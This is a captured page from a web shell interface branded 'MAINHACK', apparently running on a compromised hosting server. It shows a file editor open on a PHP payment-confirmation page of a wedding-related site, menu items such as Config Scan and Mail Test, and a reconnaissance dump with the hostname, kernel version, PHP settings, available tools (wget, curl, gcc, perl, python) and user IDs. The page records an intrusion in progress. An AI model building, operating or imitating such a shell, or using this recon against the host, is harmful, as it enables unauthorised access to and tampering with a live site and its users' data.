[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: confirm_payment.php
<?php include('header.php');?> <!-- banner-2 --> <!-- Inner-Banner --> <div class="inner-banner"> <img src="images/Vivahsure-banner2.png" alt="" class="inner-banner-img"> <div class="container"> <ul> <li><a href="order.php" class="active">Order</a></li> | <li><a href="index.php" class="">Home</a></li> </ul> </div> </div> <!-- // Inner-Banner --> <div class="cart-flipkart"> <div class="container"> <div class="flipkart-box"> <div class="row"> <form method="post"> <?php $stmt =$show->readwithdata('orders','order_id',base64_decode($_REQUEST['oid'])); while ($row = $stmt->fetch(PDO::FETCH_ASSOC)){ ?> <div class="col-md-8 col-sm-8 col-xs-12"> <div class="flipkart-box-left"> <div class="title-top"> <h3>Confirm Payment</h3> </div> <div class="det-bottom"> <div class="col-md-8 col-sm-8 col-xs-12" style="padding:0;"> <div class="det-bottom-text"> <h4>Package name <b><?=$row['package']?></b></h4> <h4>Package id <b><?=$row['package_id']?></b></h4> <h4>Days <b><?=$row['no_of_days']?> days</b></h4> <h4>Order Type <b><?=$row['marraige_type']?></b></h4> <h4>About Whose <b><?=$row['type']?></b></h4> </div> </div> </div> </div> </div> <div class="col-md-4 col-sm-4 col-xs-12"> <div class="flipkart-box-right"> <h3>Price Details </h3> <p>Price <span id="original_total"> ₹ <?=$row['price']?>/-</span></p> <p>Discount <span id="t_discount" style="color: #ff0000;" >− ₹ <?=$row['price']-$row['discounted_price']?>/-</span></p> <p>Total Cost <span id='main_total'>₹ <?=$row['discounted_price']?>/-</span> <div class="snipcart-details top_brand_home_details"> <input type="submit" value="Pay Now" name="sub" class="button" style=" "> </div> </div> </div> <?php }?> </form> </div> </div> <div class="clearfix"></div> </div> </div> <!-- //top-brands --> <!-- //top products --> <?php include('footer.php');?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 692.36 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: 1619